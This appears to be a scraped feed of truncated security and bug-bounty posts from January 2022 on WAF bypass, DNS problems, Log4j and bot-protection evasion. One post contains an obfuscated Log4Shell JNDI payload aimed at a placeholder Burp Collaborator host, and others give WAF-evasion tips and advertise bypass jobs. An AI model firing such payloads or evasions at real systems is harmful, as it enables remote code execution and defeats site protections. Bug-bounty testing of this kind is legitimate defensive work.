CISA's scanner includes 60 HTTP request headers, DNS callbacks for vulnerability detection & validation, URL lists, WAF bypass, HTTP POST, and JSO ...January 15, 2022
Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...January 15, 2022
#Cloudflare #DNS Correcting Misconfigured DNS records in cloudfare: I am using mailwizz to send mail using sending domains and at same time sending do ...January 15, 2022
Unappreciated uses of DD2:
•Snake fighting
•You get to make Inception movie jokes the entire time
•"We gotta go deeper!"
•@StackPath is easy t ...January 14, 2022
#DNS Google Cloud A record not propagating: Set A record pointing to google cloud on Cloudflare but it is not reflecting. (Budget: $12 - $30 SGD, Jobs ...January 14, 2022
Found this blog superb awesome technique he use
⬇️⬇️⬇️⬇️
#waf #firewall #cybersecurity
#infosec #bugbountytips #bugbounty #programmin ...January 13, 2022
Our Cosmos Adversarial Operations team recently found an #0day #vulnerability – a #WAF rule bypass – in the cloud WAF by @Imperva. We worked w/ Im ...January 13, 2022
Not exploiting SSTI the conventional way?
Here are some ways to bypass WAF.
#hacking #hackingweb #webxpl #bugbounty #security #bypass #ssti https:/ ...January 13, 2022
add cookie in websocket clients (python3) -- 3 https://t.co/D5ak0bXMLS hello, I have a python script that sending request using websocket-client. I a ...January 13, 2022
#ICYMI: Imperva Threat Research continues to monitor Log4j-related attack volumes and payloads.
@Info_Sec_Buzz has the details on our latest analysi ...January 11, 2022
Akamai bypass https://t.co/tsEVZQHiM0 I'm looking for developer that can do specific project with Akamai bypass (Budget: €250 - €750 EUR, Jobs: . ...January 10, 2022
#NET #CProgramming #CProgramming Akamai bypass: I'm looking for developer that can do specific project with Akamai bypass (Budget: €250 - €750 EUR ...January 10, 2022
#bugbountytips
If WAF blocked your payload on file upload you can bypass it by uploading large image content and put the payload in the middle of im ...January 10, 2022
What about automatic AFB (Advanced Filter Bypass) when there's a WAF protecting your target page and some other improvements?
Stay tuned for the firs ...January 10, 2022
Scraper for https://t.co/Qp2VY0aL36 (cloudflare protection)
Budget (30-250) USD
Name: HIRE ME
Country: United States
Client : https://t.co/Zh9w9E2SsG
...January 10, 2022